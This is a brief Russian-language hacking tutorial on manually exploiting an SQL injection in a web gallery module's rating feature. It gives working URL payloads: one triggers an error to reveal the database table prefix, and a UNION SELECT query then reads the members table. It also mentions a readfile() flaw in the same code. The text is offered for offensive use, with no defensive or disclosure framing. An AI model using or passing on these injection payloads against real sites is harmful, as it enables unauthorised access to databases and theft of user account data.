Если не можешь использовать эксплоит, учись разбирать его и делай все вручную.
Как видно из исходника, здесь присутствуют 2 уязвимости. sql-injection и readfile().
ReadFile() мы трогать не будем, тут и так все понятно.
Рассмотрим sql-injection.
Для начала узнаем префикс таблиц в бд:
http://host/?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20hellknightscrew
Теперь используем багу так:
http://host/?automodule=gallery&cmd=rate&img=1&rating=1&album=-1+union+select+1,1,1,1,1,1,1,1,1+from+prefix_members+where+id=id
вместо
prefix и
id подставляем соответствующие значения.
Как видишь, ничего сложного \=